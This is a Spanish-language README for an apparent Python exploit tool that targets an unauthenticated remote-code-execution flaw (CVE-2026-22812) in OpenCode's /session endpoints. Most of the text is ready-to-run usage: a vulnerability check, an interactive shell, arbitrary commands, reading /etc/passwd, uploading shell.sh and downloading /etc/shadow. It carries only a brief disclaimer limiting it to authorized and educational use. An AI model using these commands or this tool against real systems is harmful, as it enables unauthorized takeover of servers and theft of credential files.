
Herramienta de explotación en Python para RCE en OpenCode (CVE-2026-22812) que proporciona ejecución de comandos, lectura/escritura/subida/descarga de archivos y shell interactiva para pruebas de penetración autorizadas.
Una herramienta de explotación en Python para la vulnerabilidad de Ejecución Remota de Código (RCE) en OpenCode que afecta a versiones < v1.0.216. Esta herramienta proporciona múltiples vectores de ataque, incluida la ejecución de comandos, lectura/escritura de archivos, subida/descarga de archivos y shell interactiva.
⚠️ SOLO PARA PRUEBAS AUTORIZADAS ⚠️
# Clonar el repositorio
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# Instalar dependencias
pip install requests urllib3
# Hacer ejecutable (opcional)
chmod +x CVE-2026-22812.py
requestsurllib3python3 CVE-2026-22812.py -t http://objetivo:puerto [opciones]
# Comprobar si el objetivo es vulnerable
python3 exploit.py -t http://10.0.0.1:4096 --check
# Shell interactiva
python3 exploit.py -t http://10.0.0.1:4096 -i
# Ejecutar un solo comando
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# Leer archivo
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# Subir archivo
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# Descargar archivo
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# Obtener información del sistema
python3 exploit.py -t http://10.0.0.1:4096 --info
# Usar proxy (Burp Suite, etc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
Una vez dentro de la shell interactiva (indicador -i), puede usar:
<comando> Ejecutar comando de shell
help Mostrar menú de ayuda
exit Salir de la shell
session Mostrar ID de sesión
stats Mostrar estadísticas de explotación
read <archivo> Leer contenido del archivo
download <remoto> <local> Descargar archivo
upload <local> <remoto> Subir archivo
sysinfo Obtener información del sistema
La vulnerabilidad existe en el endpoint de gestión de sesiones (/session) que permite a usuarios no autenticados crear sesiones y ejecutar comandos arbitrarios a través del endpoint /session/{id}/shell.
POST /session - Crear sesiónPOST /session/{id}/shell - Ejecutar comandosGET /file/content - Leer archivosCVE-2026-22812.py
├── Clase Colors (códigos de color ANSI)
├── print_banner() (Mostrar banner)
├── Clase Exploit (Lógica principal de explotación)
│ ├── __init__() (Inicialización)
│ ├── check_vuln() (Comprobación de vulnerabilidad)
│ ├── create_session() (Crear sesión)
│ ├── exec_cmd() (Ejecutar comando)
│ ├── read_file() (Leer archivo)
│ ├── write_file() (Escribir archivo)
│ ├── upload() (Subir archivo)
│ ├── download() (Descargar archivo)
│ ├── get_info() (Información del sistema)
│ ├── shell() (Shell interactiva)
│ └── Métodos auxiliares
└── main() (Análisis de argumentos)
Esta herramienta se publica únicamente con fines educativos. Úsela bajo su propio riesgo.
Para problemas y preguntas, por favor: